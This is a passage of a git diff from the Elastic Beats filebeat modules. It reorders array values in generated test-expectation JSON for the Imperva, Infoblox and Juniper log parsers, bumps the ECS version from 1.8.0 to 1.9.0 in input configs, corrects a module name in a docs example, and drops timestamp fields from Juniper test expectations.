"related.user": [ "isnostr", @@ -680,8 +680,8 @@ ], "related.user": [ "sau", - "ccaeca", - "tali" + "tali", + "ccaeca" ], "rsa.counters.dclass_c1": 6818, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -752,8 +752,8 @@ "rsa.internal.event_desc": "aquae", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "accept", - "quasia" + "quasia", + "accept" ], "rsa.misc.category": "boreetdo", "rsa.misc.disposition": "aturve", @@ -809,13 +809,13 @@ "umdolor4389.api.home" ], "related.ip": [ - "10.52.125.9", - "10.204.128.215" + "10.204.128.215", + "10.52.125.9" ], "related.user": [ + "paquioff", "nci", - "rum", - "paquioff" + "rum" ], "rsa.counters.event_counter": 332, "rsa.db.database": "isau", @@ -879,9 +879,9 @@ "10.34.148.166" ], "related.user": [ + "untutlab", "miu", - "icabo", - "untutlab" + "icabo" ], "rsa.counters.dclass_c1": 5427, "rsa.counters.dclass_c1_str": "Affected Rows", 
@@ -938,8 +938,8 @@ ], "related.user": [ "conse", - "siu", - "licabo" + "licabo", + "siu" ], "rsa.counters.dclass_c1": 6356, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -995,13 +995,13 @@ "spernatu5539.domain" ], "related.ip": [ - "10.126.26.131", - "10.30.98.10" + "10.30.98.10", + "10.126.26.131" ], "related.user": [ - "olori", "dipisci", - "velite" + "velite", + "olori" ], "rsa.counters.dclass_c1": 7717, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1061,8 +1061,8 @@ "10.190.10.219" ], "related.user": [ - "quamnih", "accusant", + "quamnih", "item" ], "rsa.counters.dclass_c1": 3278, @@ -1147,8 +1147,8 @@ "maliquam2147.internal.home" ], "related.ip": [ - "10.100.98.56", - "10.248.184.200" + "10.248.184.200", + "10.100.98.56" ], "related.user": [ "boru", @@ -1213,9 +1213,9 @@ "10.82.28.220" ], "related.user": [ - "oluptat", "dtempo", - "aecatcup" + "aecatcup", + "oluptat" ], "rsa.counters.dclass_c1": 3071, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1275,9 +1275,9 @@ "10.6.27.103" ], "related.user": [ - "redol", + "asnu", "ationul", - "asnu" + "redol" ], "rsa.counters.dclass_c1": 6606, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1335,21 +1335,21 @@ "adminim2559.www5.invalid" ], "related.ip": [ - "10.88.45.111", - "10.81.184.7" + "10.81.184.7", + "10.88.45.111" ], "related.user": [ - "lmole", "undeomni", - "iameaque" + "iameaque", + "lmole" ], "rsa.counters.event_counter": 6344, "rsa.db.database": "nderi", "rsa.internal.event_desc": "iae", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "deny", - "illu" + "illu", + "deny" ], "rsa.misc.category": "quido", "rsa.misc.disposition": "emip", @@ -1407,9 +1407,9 @@ "10.29.119.245" ], "related.user": [ - "scipitl", + "taliqui", "edolorin", - "taliqui" + "scipitl" ], "rsa.counters.dclass_c1": 5140, "rsa.counters.dclass_c1_str": "Affected Rows", 
@@ -1467,12 +1467,12 @@ "temaccu5302.test" ], "related.ip": [ - "10.218.123.234", - "10.110.133.7" + "10.110.133.7", + "10.218.123.234" ], "related.user": [ - "etconsec", "caboNem", + "etconsec", "pta" ], "rsa.counters.event_counter": 5347, @@ -1480,8 +1480,8 @@ "rsa.internal.event_desc": "liquid", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "allow", - "vitaed" + "vitaed", + "allow" ], "rsa.misc.category": "enim", "rsa.misc.disposition": "Finibus", @@ -1539,9 +1539,9 @@ "10.105.190.170" ], "related.user": [ + "doeiu", "mquisn", - "litan", - "doeiu" + "litan" ], "rsa.counters.dclass_c1": 3474, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1599,8 +1599,8 @@ "idunt4633.internal.host" ], "related.ip": [ - "10.123.166.197", - "10.59.188.188" + "10.59.188.188", + "10.123.166.197" ], "related.user": [ "liquam", @@ -1612,8 +1612,8 @@ "rsa.internal.event_desc": "tautfug", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "block", - "itae" + "itae", + "block" ], "rsa.misc.category": "giatquov", "rsa.misc.disposition": "olu", @@ -1670,9 +1670,9 @@ "10.72.75.207" ], "related.user": [ - "eufug", "eFini", - "urau" + "urau", + "eufug" ], "rsa.counters.dclass_c1": 3348, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1728,13 +1728,13 @@ "snu6436.www.local" ], "related.ip": [ - "10.58.133.175", - "10.9.46.123" + "10.9.46.123", + "10.58.133.175" ], "related.user": [ "nde", - "mfu", - "oco" + "oco", + "mfu" ], "rsa.counters.dclass_c1": 3795, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1794,9 +1794,9 @@ "10.169.50.59" ], "related.user": [ + "pta", "mquisnos", - "veniamq", - "pta" + "veniamq" ], "rsa.counters.dclass_c1": 2358, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -1856,8 +1856,8 @@ "10.137.85.123" ], "related.user": [ - "Bonorum", "sis", + "Bonorum", "ames" ], "rsa.counters.dclass_c1": 6401, 
@@ -1944,21 +1944,21 @@ "upt6017.api.localdomain" ], "related.ip": [ - "10.64.184.196", - "10.173.178.109" + "10.173.178.109", + "10.64.184.196" ], "related.user": [ "nesci", - "tam", - "uian" + "uian", + "tam" ], "rsa.counters.event_counter": 4493, "rsa.db.database": "sin", "rsa.internal.event_desc": "orin", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "lamco", - "block" + "block", + "lamco" ], "rsa.misc.category": "enia", "rsa.misc.disposition": "iavol", @@ -2074,13 +2074,13 @@ "con6049.internal.lan" ], "related.ip": [ - "10.59.182.36", - "10.18.150.82" + "10.18.150.82", + "10.59.182.36" ], "related.user": [ - "mtota", + "qua", "luptat", - "qua" + "mtota" ], "rsa.counters.dclass_c1": 6112, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2167,9 +2167,9 @@ "10.228.229.144" ], "related.user": [ - "lam", "ama", - "ametcons" + "ametcons", + "lam" ], "rsa.counters.dclass_c1": 4325, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2221,13 +2221,13 @@ "tium3542.internal.invalid" ], "related.ip": [ - "10.242.48.203", - "10.147.142.242" + "10.147.142.242", + "10.242.48.203" ], "related.user": [ - "quisn", + "quasi", "ese", - "quasi" + "quisn" ], "rsa.counters.dclass_c1": 3970, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2285,13 +2285,13 @@ "radipis3991.mail.invalid" ], "related.ip": [ - "10.254.10.98", - "10.213.165.165" + "10.213.165.165", + "10.254.10.98" ], "related.user": [ - "civeli", + "eufugia", "ttenb", - "eufugia" + "civeli" ], "rsa.counters.event_counter": 7365, "rsa.db.database": "utlabore", @@ -2456,8 +2456,8 @@ ], "related.user": [ "volupta", - "umq", - "tsunt" + "tsunt", + "umq" ], "rsa.counters.dclass_c1": 744, "rsa.counters.dclass_c1_str": "Affected Rows", 
@@ -2513,13 +2513,13 @@ "setquas6188.internal.local" ], "related.ip": [ - "10.100.113.11", - "10.152.213.228" + "10.152.213.228", + "10.100.113.11" ], "related.user": [ - "ptatev", + "velillum", "itationu", - "velillum" + "ptatev" ], "rsa.counters.dclass_c1": 7245, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2727,13 +2727,13 @@ "idents7231.mail.home" ], "related.ip": [ - "10.151.203.60", - "10.117.81.75" + "10.117.81.75", + "10.151.203.60" ], "related.user": [ - "dol", "exeac", - "iconsequ" + "iconsequ", + "dol" ], "rsa.counters.dclass_c1": 484, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2793,8 +2793,8 @@ "10.224.217.153" ], "related.user": [ - "utlabo", "imav", + "utlabo", "eriti" ], "rsa.counters.dclass_c1": 922, @@ -2856,17 +2856,17 @@ "10.1.193.187" ], "related.user": [ + "ugi", "hite", - "adipis", - "ugi" + "adipis" ], "rsa.counters.event_counter": 508, "rsa.db.database": "abo", "rsa.internal.event_desc": "epteurs", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "allow", - "taevitae" + "taevitae", + "allow" ], "rsa.misc.category": "itse", "rsa.misc.disposition": "rever", @@ -2924,8 +2924,8 @@ ], "related.user": [ "mquamei", - "eiusm", - "sum" + "sum", + "eiusm" ], "rsa.counters.dclass_c1": 3058, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -2977,13 +2977,13 @@ "fde7756.mail.corp" ], "related.ip": [ - "10.122.127.237", - "10.86.121.152" + "10.86.121.152", + "10.122.127.237" ], "related.user": [ - "ine", + "nimv", "consecte", - "nimv" + "ine" ], "rsa.counters.dclass_c1": 2771, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3101,13 +3101,13 @@ "edictas4693.home" ], "related.ip": [ - "10.223.56.33", - "10.200.12.126" + "10.200.12.126", + "10.223.56.33" ], "related.user": [ - "Nequepo", + "magnido", "elitsedd", - "magnido" + "Nequepo" ], "rsa.counters.dclass_c1": 3243, "rsa.counters.dclass_c1_str": "Affected Rows", 
@@ -3165,13 +3165,13 @@ "nibu2565.api.local" ], "related.ip": [ - "10.65.225.101", - "10.94.89.177" + "10.94.89.177", + "10.65.225.101" ], "related.user": [ + "tuserror", "emquel", - "citation", - "tuserror" + "citation" ], "rsa.counters.event_counter": 2513, "rsa.db.database": "rspiciat", @@ -3232,13 +3232,13 @@ "tsun7120.home" ], "related.ip": [ - "10.191.184.105", - "10.65.174.196" + "10.65.174.196", + "10.191.184.105" ], "related.user": [ - "iin", "uta", - "tione" + "tione", + "iin" ], "rsa.counters.dclass_c1": 5836, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3292,13 +3292,13 @@ "lumquid6940.mail.localdomain" ], "related.ip": [ - "10.41.181.179", - "10.224.148.48" + "10.224.148.48", + "10.41.181.179" ], "related.user": [ "niam", - "equepor", - "iosamn" + "iosamn", + "equepor" ], "rsa.counters.event_counter": 7468, "rsa.db.database": "erspicia", @@ -3360,13 +3360,13 @@ "amcorp7299.api.example" ], "related.ip": [ - "10.21.61.134", - "10.21.208.103" + "10.21.208.103", + "10.21.61.134" ], "related.user": [ "imidest", - "mipsa", - "ostr" + "ostr", + "mipsa" ], "rsa.counters.dclass_c1": 7766, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3426,8 +3426,8 @@ "10.221.192.116" ], "related.user": [ - "iarchit", "tevelite", + "iarchit", "iamquisn" ], "rsa.counters.dclass_c1": 639, @@ -3486,13 +3486,13 @@ "tionevol3157.mail.invalid" ], "related.ip": [ - "10.240.62.238", - "10.191.142.143" + "10.191.142.143", + "10.240.62.238" ], "related.user": [ + "animide", "modtempo", - "nofde", - "animide" + "nofde" ], "rsa.counters.event_counter": 7580, "rsa.db.database": "Lore", @@ -3559,17 +3559,17 @@ "10.178.79.217" ], "related.user": [ - "inibusBo", "ccusan", - "tqui" + "tqui", + "inibusBo" ], "rsa.counters.event_counter": 3538, "rsa.db.database": "sequun", "rsa.internal.event_desc": "adeseru", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "deny", - "orisnis" + "orisnis", + "deny" ], "rsa.misc.category": "sitas", "rsa.misc.disposition": "eni", 
@@ -3622,13 +3622,13 @@ "urad5712.api.host" ], "related.ip": [ - "10.161.225.172", - "10.77.86.215" + "10.77.86.215", + "10.161.225.172" ], "related.user": [ - "rcit", + "xerc", "meaqu", - "xerc" + "rcit" ], "rsa.counters.dclass_c1": 7286, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3687,8 +3687,8 @@ "10.186.133.184" ], "related.user": [ - "boriosa", "sci", + "boriosa", "acons" ], "rsa.counters.dclass_c1": 1578, @@ -3740,8 +3740,8 @@ "inBCSed5308.api.corp" ], "related.ip": [ - "10.254.198.47", - "10.160.147.230" + "10.160.147.230", + "10.254.198.47" ], "related.user": [ "nimvenia", @@ -3798,13 +3798,13 @@ "reseo2067.api.localdomain" ], "related.ip": [ - "10.40.24.93", - "10.182.197.243" + "10.182.197.243", + "10.40.24.93" ], "related.user": [ - "mSecti", + "orisnis", "exerci", - "orisnis" + "mSecti" ], "rsa.counters.dclass_c1": 4129, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3860,13 +3860,13 @@ "itte6905.mail.invalid" ], "related.ip": [ - "10.249.13.159", - "10.108.130.106" + "10.108.130.106", + "10.249.13.159" ], "related.user": [ + "colab", "uisautei", - "exeacomm", - "colab" + "exeacomm" ], "rsa.counters.dclass_c1": 1044, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -3924,21 +3924,21 @@ "caboNemo274.www.host" ], "related.ip": [ - "10.39.244.49", - "10.64.94.174" + "10.64.94.174", + "10.39.244.49" ], "related.user": [ - "estiae", + "Sedut", "iunt", - "Sedut" + "estiae" ], "rsa.counters.event_counter": 7128, "rsa.db.database": "eFinibu", "rsa.internal.event_desc": "enimips", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "cancel", - "gna" + "gna", + "cancel" ], "rsa.misc.category": "Nequepor", "rsa.misc.disposition": "nisiu", @@ -4052,8 +4052,8 @@ ], "related.user": [ "utoditau", - "orpori", - "involu" + "involu", + "orpori" ], "rsa.counters.dclass_c1": 7868, "rsa.counters.dclass_c1_str": "Affected Rows", 
@@ -4113,9 +4113,9 @@ "10.251.212.166" ], "related.user": [ - "gnido", + "uptat", "inculp", - "uptat" + "gnido" ], "rsa.counters.dclass_c1": 6947, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4203,9 +4203,9 @@ "10.20.231.188" ], "related.user": [ + "mqu", "tesseq", - "uatDuisa", - "mqu" + "uatDuisa" ], "rsa.counters.dclass_c1": 1623, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4294,8 +4294,8 @@ ], "related.user": [ "ineavol", - "volu", - "rehe" + "rehe", + "volu" ], "rsa.counters.dclass_c1": 3064, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4411,9 +4411,9 @@ "10.57.169.205" ], "related.user": [ - "ctas", "iuta", - "ipsu" + "ipsu", + "ctas" ], "rsa.counters.dclass_c1": 392, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4473,9 +4473,9 @@ "10.129.234.200" ], "related.user": [ - "tisundeo", "dquia", - "tevelit" + "tevelit", + "tisundeo" ], "rsa.counters.dclass_c1": 6709, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4531,13 +4531,13 @@ "ididu5928.www5.local" ], "related.ip": [ - "10.111.132.221", - "10.76.121.224" + "10.76.121.224", + "10.111.132.221" ], "related.user": [ "ali", - "scive", - "oloremi" + "oloremi", + "scive" ], "rsa.counters.dclass_c1": 6155, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4597,9 +4597,9 @@ "10.195.8.141" ], "related.user": [ - "ota", + "dolo", "enimip", - "dolo" + "ota" ], "rsa.counters.dclass_c1": 469, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4655,12 +4655,12 @@ "ssusc1892.internal.host" ], "related.ip": [ - "10.179.60.167", - "10.173.13.179" + "10.173.13.179", + "10.179.60.167" ], "related.user": [ - "ptasn", "isn", + "ptasn", "apar" ], "rsa.counters.dclass_c1": 758, @@ -4721,9 +4721,9 @@ "10.178.190.123" ], "related.user": [ + "orsi", "ore", - "tiset", - "orsi" + "tiset" ], "rsa.counters.dclass_c1": 2290, "rsa.counters.dclass_c1_str": "Affected Rows", 
@@ -4807,13 +4807,13 @@ "uidolo7626.local" ], "related.ip": [ - "10.8.147.176", - "10.207.198.239" + "10.207.198.239", + "10.8.147.176" ], "related.user": [ + "Loremips", "incididu", - "aUteni", - "Loremips" + "aUteni" ], "rsa.counters.dclass_c1": 3043, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4868,13 +4868,13 @@ "dmini3435.internal.domain" ], "related.ip": [ - "10.206.221.180", - "10.116.26.185" + "10.116.26.185", + "10.206.221.180" ], "related.user": [ - "nseq", + "oNe", "litesseq", - "oNe" + "nseq" ], "rsa.counters.dclass_c1": 3218, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -4930,9 +4930,9 @@ "10.86.180.150" ], "related.user": [ + "mnisis", "itasper", - "etconsec", - "mnisis" + "etconsec" ], "rsa.counters.dclass_c1": 4564, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5002,8 +5002,8 @@ "rsa.internal.event_desc": "enima", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "atisu", - "allow" + "allow", + "atisu" ], "rsa.misc.category": "emseq", "rsa.misc.disposition": "osamni", @@ -5088,9 +5088,9 @@ "10.150.27.144" ], "related.user": [ + "ditautf", "tuserror", - "res", - "ditautf" + "res" ], "rsa.counters.dclass_c1": 4367, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5146,13 +5146,13 @@ "tqui5172.www.local" ], "related.ip": [ - "10.146.131.76", - "10.173.19.140" + "10.173.19.140", + "10.146.131.76" ], "related.user": [ + "orsi", "olo", - "Except", - "orsi" + "Except" ], "rsa.counters.dclass_c1": 5844, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5207,13 +5207,13 @@ "intocca6708.mail.corp" ], "related.ip": [ - "10.171.175.165", - "10.69.5.227" + "10.69.5.227", + "10.171.175.165" ], "related.user": [ - "rumw", "doloreme", - "ntocc" + "ntocc", + "rumw" ], "rsa.counters.dclass_c1": 5201, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5269,9 +5269,9 @@ "10.213.214.118" ], "related.user": [ - "nrep", "epteurs", - "ate" + "ate", + "nrep" ], "rsa.counters.dclass_c1": 6260, "rsa.counters.dclass_c1_str": "Affected Rows", 
@@ -5329,12 +5329,12 @@ "commodo6041.mail.localhost" ], "related.ip": [ - "10.149.91.130", - "10.89.26.170" + "10.89.26.170", + "10.149.91.130" ], "related.user": [ - "atus", "aboris", + "atus", "orumetMa" ], "rsa.counters.event_counter": 5863, @@ -5398,21 +5398,21 @@ "gitse6744.api.local" ], "related.ip": [ - "10.81.108.232", - "10.52.106.68" + "10.52.106.68", + "10.81.108.232" ], "related.user": [ + "aco", "neavolup", - "uaturve", - "aco" + "uaturve" ], "rsa.counters.event_counter": 5098, "rsa.db.database": "lapa", "rsa.internal.event_desc": "pis", "rsa.internal.messageid": "Imperva", "rsa.misc.action": [ - "allow", - "Quisaut" + "Quisaut", + "allow" ], "rsa.misc.category": "idol", "rsa.misc.disposition": "mmodico", @@ -5468,13 +5468,13 @@ "par3605.internal.localdomain" ], "related.ip": [ - "10.223.10.28", - "10.230.48.97" + "10.230.48.97", + "10.223.10.28" ], "related.user": [ + "untex", "erit", - "usmodte", - "untex" + "usmodte" ], "rsa.counters.event_counter": 4029, "rsa.db.database": "ommodi", @@ -5540,8 +5540,8 @@ "10.115.42.231" ], "related.user": [ - "tasnul", "sequamn", + "tasnul", "res" ], "rsa.counters.dclass_c1": 4846, @@ -5604,9 +5604,9 @@ "10.247.108.144" ], "related.user": [ + "tema", "fugia", - "maccusan", - "tema" + "maccusan" ], "rsa.counters.event_counter": 3711, "rsa.db.database": "psa", @@ -5672,8 +5672,8 @@ ], "related.user": [ "illumd", - "rExcep", - "nimides" + "nimides", + "rExcep" ], "rsa.counters.dclass_c1": 4173, "rsa.counters.dclass_c1_str": "Affected Rows", @@ -5731,9 +5731,9 @@ "10.116.76.161" ], "related.user": [ - "idu", + "ide", "trudex", - "ide" + "idu" ], "rsa.counters.event_counter": 2608, "rsa.db.database": "ncul", @@ -5798,8 +5798,8 @@ "10.144.14.15" ], "related.user": [ - "rspic", "upta", + "rspic", "utlab" ], "rsa.counters.dclass_c1": 4810, 
@@ -5859,9 +5859,9 @@ "10.18.15.43" ], "related.user": [ - "quaturve", "quei", - "caecat" + "caecat", + "quaturve" ], "rsa.counters.dclass_c1": 983, "rsa.counters.dclass_c1_str": "Affected Rows", diff --git a/x-pack/filebeat/module/infoblox/nios/config/input.yml b/x-pack/filebeat/module/infoblox/nios/config/input.yml index 6f404d2ce46..12e2f80c468 100644 --- a/x-pack/filebeat/module/infoblox/nios/config/input.yml +++ b/x-pack/filebeat/module/infoblox/nios/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json b/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json index ba5e90b6d89..b0399082af5 100644 --- a/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json +++ b/x-pack/filebeat/module/infoblox/nios/test/generated.log-expected.json @@ -621,8 +621,8 @@ "observer.type": "IPAM", "observer.vendor": "Infoblox", "related.hosts": [ - "conse2991.internal.lan", - "amvolup7700.www5.corp" + "amvolup7700.www5.corp", + "conse2991.internal.lan" ], "related.ip": [ "10.116.104.101" @@ -2142,8 +2142,8 @@ "col3570.www.invalid" ], "related.user": [ - "rcit", - "rroq" + "rroq", + "rcit" ], "rsa.email.email_dst": "tsed", "rsa.internal.messageid": "sSMTP", @@ -2246,8 +2246,8 @@ "observer.type": "IPAM", "observer.vendor": "Infoblox", "related.hosts": [ - "tatem4180.www.home", - "eritatis6343.api.local" + "eritatis6343.api.local", + "tatem4180.www.home" ], "rsa.internal.messageid": "python", "rsa.misc.action": [ diff --git a/x-pack/filebeat/module/iptables/log/config/input.yml b/x-pack/filebeat/module/iptables/log/config/input.yml index 5226893b62c..540dc49c444 100644 --- a/x-pack/filebeat/module/iptables/log/config/input.yml +++ b/x-pack/filebeat/module/iptables/log/config/input.yml @@ -55,4 +55,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 
diff --git a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc index 3e145ea81c9..ca299f9302f 100644 --- a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc @@ -68,7 +68,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp diff --git a/x-pack/filebeat/module/juniper/junos/config/input.yml b/x-pack/filebeat/module/juniper/junos/config/input.yml index 6c3777a8325..701ad2354fd 100644 --- a/x-pack/filebeat/module/juniper/junos/config/input.yml +++ b/x-pack/filebeat/module/juniper/junos/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json b/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json index 299b588a5f0..bf6b5539c73 100644 --- a/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json +++ b/x-pack/filebeat/module/juniper/junos/test/generated.log-expected.json @@ -1,6 +1,5 @@ [ { - "@timestamp": "2020-01-29T08:09:59.000Z", "event.action": "RPD_SCHED_TASK_LONGRUNTIME", "event.code": "RPD_SCHED_TASK_LONGRUNTIME", "event.dataset": "juniper.junos", @@ -22,7 +21,6 @@ "rsa.misc.event_type": "RPD_SCHED_TASK_LONGRUNTIME", "rsa.misc.pid": "6713", "rsa.time.day": "29", - "rsa.time.event_time": "2020-01-29T08:09:59.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "tags": [ @@ -31,7 +29,6 @@ ] }, { - "@timestamp": "2020-02-12T15:12:33.000Z", "event.action": "llu", "event.code": "DCD_FILTER_LIB_ERROR", "event.dataset": "juniper.junos", @@ -49,7 +46,6 @@ "rsa.internal.messageid": "DCD_FILTER_LIB_ERROR", "rsa.misc.event_type": "llu", "rsa.time.day": "12", - "rsa.time.event_time": "2020-02-12T15:12:33.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ 
@@ -58,7 +54,6 @@ ] }, { - "@timestamp": "2020-02-26T22:15:08.000Z", "event.action": "cancel", "event.code": "MIB2D_TRAP_SEND_FAILURE", "event.dataset": "juniper.junos", @@ -80,7 +75,6 @@ "rsa.misc.event_type": "sum", "rsa.misc.result": "success", "rsa.time.day": "26", - "rsa.time.event_time": "2020-02-26T22:15:08.000Z", "rsa.time.month": "Feb", "service.name": "uaerat", "service.type": "juniper", @@ -90,7 +84,6 @@ ] }, { - "@timestamp": "2020-03-12T05:17:42.000Z", "event.code": "node", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -113,7 +106,6 @@ "fug5500.www.domain" ], "rsa.time.day": "12", - "rsa.time.event_time": "2020-03-12T05:17:42.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -122,7 +114,6 @@ ] }, { - "@timestamp": "2020-03-26T12:20:16.000Z", "event.code": "[7400]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -135,7 +126,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[7400]", "rsa.time.day": "26", - "rsa.time.event_time": "2020-03-26T12:20:16.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -144,7 +134,6 @@ ] }, { - "@timestamp": "2020-04-09T19:22:51.000Z", "event.action": "ionul", "event.code": "RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED", "event.dataset": "juniper.junos", @@ -164,7 +153,6 @@ "rsa.misc.event_type": "ionul", "rsa.misc.result": "unknown", "rsa.time.day": "9", - "rsa.time.event_time": "2020-04-09T19:22:51.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -173,7 +161,6 @@ ] }, { - "@timestamp": "2020-04-24T02:25:25.000Z", "event.action": "ume", "event.code": "CHASSISD_SNMP_TRAP10", "event.dataset": "juniper.junos", @@ -193,7 +180,6 @@ "rsa.misc.event_type": "ume", "rsa.misc.result": "failure", "rsa.time.day": "24", - "rsa.time.event_time": "2020-04-24T02:25:25.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ 
@@ -202,7 +188,6 @@ ] }, { - "@timestamp": "2020-05-08T09:27:59.000Z", "event.action": "RPD_KRT_IFL_CELL_RELAY_MODE_INVALID:", "event.code": "RPD_KRT_IFL_CELL_RELAY_MODE_INVALID", "event.dataset": "juniper.junos", @@ -222,7 +207,6 @@ "rsa.misc.event_type": "RPD_KRT_IFL_CELL_RELAY_MODE_INVALID:", "rsa.misc.result": "failure", "rsa.time.day": "8", - "rsa.time.event_time": "2020-05-08T09:27:59.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -231,7 +215,6 @@ ] }, { - "@timestamp": "2020-05-22T16:30:33.000Z", "event.action": "SNMPD_USER_ERROR", "event.code": "SNMPD_USER_ERROR", "event.dataset": "juniper.junos", @@ -255,7 +238,6 @@ "rsa.misc.event_type": "SNMPD_USER_ERROR", "rsa.misc.result": "conseq: unknown", "rsa.time.day": "22", - "rsa.time.event_time": "2020-05-22T16:30:33.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -265,7 +247,6 @@ "user.name": "atiset" }, { - "@timestamp": "2020-06-05T23:33:08.000Z", "event.code": "[4621]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -278,7 +259,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[4621]", "rsa.time.day": "5", - "rsa.time.event_time": "2020-06-05T23:33:08.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -287,7 +267,6 @@ ] }, { - "@timestamp": "2020-06-20T06:35:42.000Z", "event.code": "[2227]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -300,7 +279,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[2227]", "rsa.time.day": "20", - "rsa.time.event_time": "2020-06-20T06:35:42.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -309,7 +287,6 @@ ] }, { - "@timestamp": "2020-07-04T13:38:16.000Z", "event.action": "aper", "event.code": "NASD_PPP_SEND_PARTIAL", "event.dataset": "juniper.junos", 
@@ -328,7 +305,6 @@ "rsa.misc.event_type": "aper", "rsa.misc.result_code": "santiumd", "rsa.time.day": "4", - "rsa.time.event_time": "2020-07-04T13:38:16.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -337,7 +313,6 @@ ] }, { - "@timestamp": "2020-07-18T20:40:50.000Z", "event.action": "temqu", "event.code": "UI_COMMIT_AT_FAILED", "event.dataset": "juniper.junos", @@ -357,7 +332,6 @@ "rsa.misc.event_type": "temqu", "rsa.misc.result": "success", "rsa.time.day": "18", - "rsa.time.event_time": "2020-07-18T20:40:50.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -366,7 +340,6 @@ ] }, { - "@timestamp": "2020-08-02T03:43:25.000Z", "event.action": "BOOTPD_NEW_CONF:", "event.code": "BOOTPD_NEW_CONF", "event.dataset": "juniper.junos", @@ -384,7 +357,6 @@ "rsa.internal.messageid": "BOOTPD_NEW_CONF", "rsa.misc.event_type": "BOOTPD_NEW_CONF:", "rsa.time.day": "2", - "rsa.time.event_time": "2020-08-02T03:43:25.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -393,7 +365,6 @@ ] }, { - "@timestamp": "2020-08-16T10:45:59.000Z", "event.action": "onemulla", "event.code": "RPD_RIP_JOIN_MULTICAST", "event.dataset": "juniper.junos", @@ -414,7 +385,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "enp0s4292", "rsa.time.day": "16", - "rsa.time.event_time": "2020-08-16T10:45:59.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -423,7 +393,6 @@ ] }, { - "@timestamp": "2020-08-30T17:48:33.000Z", "event.action": "xea", "event.code": "FSAD_TERMINATED_CONNECTION", "event.dataset": "juniper.junos", @@ -443,7 +412,6 @@ "rsa.misc.event_type": "xea", "rsa.misc.result": "unknown", "rsa.time.day": "30", - 